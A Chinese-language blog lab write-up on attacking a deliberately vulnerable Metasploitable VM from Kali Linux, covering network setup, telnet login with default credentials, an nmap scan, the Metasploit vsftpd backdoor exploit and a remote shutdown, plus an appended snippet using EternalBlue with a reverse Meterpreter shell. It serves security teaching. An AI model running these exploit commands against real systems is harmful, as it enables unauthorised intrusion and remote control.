Linux漏洞攻击实验

漏洞攻击实验

第一步 配置环境
攻击系统:VMware、Kali-linux
Kali 是一个基于 Debian 的 Linux 发行版,面向专业的渗透测试和安全审计,言下之意就是它自带漏洞攻击的工具,可以用来做入侵测试。
在这里插入图片描述
靶机:Virtual box、Metasploitable-linux
Metasploitable是故意设计用于测试安全工具的并展示常见易受攻击的漏洞的linux系统。言下之意就是它生来就是一个设计好的靶机,存在各种漏洞。

  • 用户名:msfadmin
  • 密码:msfadmin
    在这里插入图片描述
    VMware和Virtual box是两种不同的虚拟机,这些软件在相应的官网上都可以找得到,下载安装就行。

第二步 检查网络连接

物理主机与攻击系统的网络连接方式:NAT模式。
在这里插入图片描述
物理主机与靶机的网络连接的方式:桥接模式(Intel)。
在这里插入图片描述
测试网络连接的时候,可能因为操作系统、软件版本的不同而导致需要不同的连接方式。需要自己多试几次,标准就是:

  • 物理主机ping攻击系统可以ping通。
  • 物理主机ping靶机可以ping通。

接下来我们就来测试一下:
首先需要查看各个系统的IP,进入命令终端,Windows输入ipconfig,Linux输入ifconfig。
物理主机的IP:172.23.72.95
在这里插入图片描述
攻击系统的IP:192.168.231.130
在这里插入图片描述
靶机系统的IP:172.23.32.185
在这里插入图片描述
先用物理主机分别ping一下攻击系统和靶机:
在这里插入图片描述
在这里插入图片描述
可以看到都ping得通,说明网络连接没问题。按照我的理解,物理主机与攻击系统共享一个IP,现在主机能够ping通靶机,那么攻击系统也能ping通靶机。

来测试一下:
在这里插入图片描述
可以看到也成功了,但实际上有一个情况,就是靶机不能ping通物理主机和攻击系统。
在这里插入图片描述
猜想:可能由于物理主机和攻击系统存在防火墙方面的设置所以不能被ping通,也有可能是因为之前虚拟机的网络连接方式。但采用其他方式会直接导致没网,所以只能使用目前的方式。Anyway,这并不影响我们做后续的实验。

谁ping都通的才是靶机,谁ping都不通的才有资格攻击。

第三步 简单检测

为了说明这个靶机系统的到底有多脆弱,我们先来预热一下。
直接在浏览器输入靶机的IP,可以看到:
在这里插入图片描述
在攻击系统端使用telnet命令直接远程登录:
在这里插入图片描述
输入用户名和密码就可以登录进去:
在这里插入图片描述
第四步 正式攻击
使用nmap命令先检测一下靶机上的端口状态:在这里插入图片描述
可以看到很多端口都在开启状态,输入msfconsole,启动metasploit。
在这里插入图片描述
输入 use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞,
输入 set RHOST 172.23.32.185 设置端口,
输入 exploit 开始攻击。
在这里插入图片描述
输入 uname -a 检查所处的系统信息,相当于“我是谁我在哪?”可以看到输出的信息是靶机的,说明已经成功进入靶机。
输入 shutdown -h now 尝试把靶机关掉。
在这里插入图片描述
可以看到通过kali成功进入另外一个操作系统,然后把它关机,这次实验就算成功了。

  • 8
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Kali Linux是一款专业的渗透测试和攻击工具集,可以用于测试网络和系统的安全性。以下是一个简单的Kali Linux攻击实验,仅供学习和研究使用,禁止用于非法用途。 1. 安装Kali Linux 首先,您需要安装Kali Linux。您可以从官方网站上下载Kali Linux的ISO镜像文件,并使用它来安装Kali Linux。安装步骤与安装其他操作系统类似。 2. 扫描目标主机 使用Kali Linux中的Nmap工具扫描目标主机,以了解目标主机上哪些端口是打开的。在终端中输入以下命令: ``` nmap -p- <目标主机IP> ``` 这将扫描目标主机上的所有端口,并列出哪些端口是打开的。 3. 发起攻击 接下来,您可以使用Kali Linux中的Metasploit工具发起攻击Metasploit是一个强大的攻击工具,可以利用已知的漏洞对系统进行攻击。在终端中输入以下命令来启动Metasploit: ``` msfconsole ``` 然后,您可以使用Metasploit中的exploit或payload模块对目标主机进行攻击。例如,以下命令将使用Metasploit的EternalBlue漏洞模块对目标主机进行攻击: ``` use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标主机IP> set payload windows/x64/meterpreter/reverse_tcp run ``` 这将利用EternalBlue漏洞对目标主机进行攻击,并在目标主机上安装一个反向TCP Meterpreter shell。 4. 接管目标主机 一旦攻击成功,您可以使用Metasploit中的反向TCP Meterpreter shell接管目标主机。在Metasploit终端中输入以下命令来启动反向TCP Meterpreter shell: ``` sessions -i 1 ``` 这将启动与目标主机的交互式会话。您可以使用Meterpreter shell执行各种命令,例如查看目标主机上的文件、下载文件、上传文件、截取屏幕等等。 请注意,这只是一个简单的Kali Linux攻击实验,实际的攻击工作需要深入的技术知识和严格的道德准则。在进行任何攻击操作之前,请务必了解相关法律法规,并遵守道德准则。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值